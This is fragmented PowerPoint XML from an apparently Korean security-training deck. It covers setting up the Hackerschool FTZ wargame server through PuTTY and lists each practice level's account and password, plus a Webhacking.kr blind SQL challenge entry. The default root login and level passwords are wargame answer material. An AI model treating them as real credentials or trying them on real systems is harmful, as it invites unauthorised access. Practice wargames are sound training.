              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>아이디 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패스워드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hackerschool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 로그인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 명령어를 입력하여 서버 아이피를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a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>다운로드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>자신의 컴퓨터에 맞는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:hlinkClick r:id="rId3"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8837778F-67BB-405B-AC96-6E98989F1F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1427358" y="909975"/>
            <a:ext cx="3705225" cy="1914525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF233F60-6B12-46BE-95E8-3BBE10946D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499767" y="3789973"/>
            <a:ext cx="5407419" cy="1370683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8036AF56-68C0-466A-81A3-750F61E91C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499767" y="5311099"/>
            <a:ext cx="5407419" cy="822048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1394D64-6990-4F3C-895C-1D84AE687CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314519" y="724853"/>
            <a:ext cx="5377713" cy="2876103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D1BDEE-D188-45DB-8C81-7763F8EACC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7646973" y="1683143"/>
            <a:ext cx="1043873" cy="1213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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DF890C-83DD-4C34-BEA2-65A2ECB8A530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6798808" y="4115912"/>
            <a:ext cx="4519027" cy="2341978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7E700E-E79A-498C-A615-44C81A9705B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7783189" y="5509319"/>
            <a:ext cx="1546928" cy="3169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50242750"/>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7993367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/Training/FTZ/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level2</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level2 / hacker or cracker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9046073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6209055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/Training/FTZ/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level3</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level3</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level3 / can you fly?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4599106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54308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/Training/FTZ/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level4</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level4</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level4 / suck my brain</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7520348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4477734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/Training/FTZ/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level5</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level5</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level5 / what is your name?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831558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301640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/Training/FTZ/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level6</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level6</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level6 / what the hell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88471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다운받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설치  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>그냥 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>누르면 설치됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9. putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>실행후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, FTZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>( 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번에서 확인한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 입력한다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Window -&gt; Translation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탭에 들어가서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Use font encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 바꾼다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>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CCCDDE00-4F30-400E-992D-50E9102BD718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062155" y="957937"/>
            <a:ext cx="4276725" cy="4181475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="직사각형 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A143DE-58E0-48B2-85E9-315D74454FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2620470" y="1981191"/>
            <a:ext cx="972394" cy="2279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그림 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CB66E87-603D-464F-BEE9-77A1F5E4506A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7057028" y="844550"/>
            <a:ext cx="4353533" cy="5039428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222833501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922532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/Training/FTZ/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level7</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level7</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level7 / come together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169184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8059122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/Training/FTZ/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  Level8</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level8</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level8 / break the world</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9584829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4771471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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Webhacking.kr</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869976713"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="1953081"/>
          <a:ext cx="9093843" cy="3930912"/>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blind </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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41013863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/Training/WHK/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  old-02</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old-02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https://webhacking.kr/challenge</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028814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8915175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3949561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a:xfrm>
            <a:off x="838200" y="2766218"/>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부록</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="화살표: 오른쪽 2">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68952EE9-EA36-40D6-8579-506BFF052086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580445" y="2997643"/>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hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1033A246-46D6-46EA-AE77-5999C3FE93D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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목         차</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE520AA-A08F-40A2-AD4C-BD9898571D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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국방 사이버 보안</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="직사각형 5">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F4F51D6-0CFA-493D-A732-FF68B5764ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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시스템</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="직사각형 6">
            <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23856895-6317-40E3-95E2-4F34A89540EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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네트워크</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="직사각형 7">
            <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0862F98-C192-4E5C-9148-7D8A5E3B893F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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웹</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="직사각형 8">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6166EC0C-4CA5-4A89-A45B-69140049A4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878373"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정보보호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3937DCDC-23AD-4264-A83F-0FA2BB57639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8CB68A4-0472-4DD0-B090-0495480E13E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9C07507-D3B0-498E-8AEA-EF3B45A068A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C0F532F-0741-4A3F-AEE6-41A305119F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직사각형 19">
            <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{044E5C00-9705-4258-B73F-149C17872D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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이  론</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD180F-2133-442C-9D26-130025006603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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2" name="직사각형 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8F9C16A-9322-4BB4-8F89-27DE63D339BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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3" name="직사각형 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E929CE-2106-4E94-BCFB-B723F4B4DFAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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4" name="직사각형 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF34562-B189-444C-9C53-82D8A53524E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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5" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD72D96-C046-4849-9A47-88DFF7D5E509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581581"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25614863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Window -&gt; Appearance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 가서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 누른다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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원하는 글꼴로 바꾸고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스크립트를 한글로 바꾼다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.  -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-&gt; Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 다시 간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</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8BDD3E6-CBDE-46AD-9B82-7BFC4220E7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="848863" y="739451"/>
            <a:ext cx="4295775" cy="4181475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="직사각형 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB579E7B-6DC4-4814-B2FE-5789B22E4941}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4337331" y="2548991"/>
            <a:ext cx="647363" cy="2427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73185558-F351-40A0-90EC-770AA5EABC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
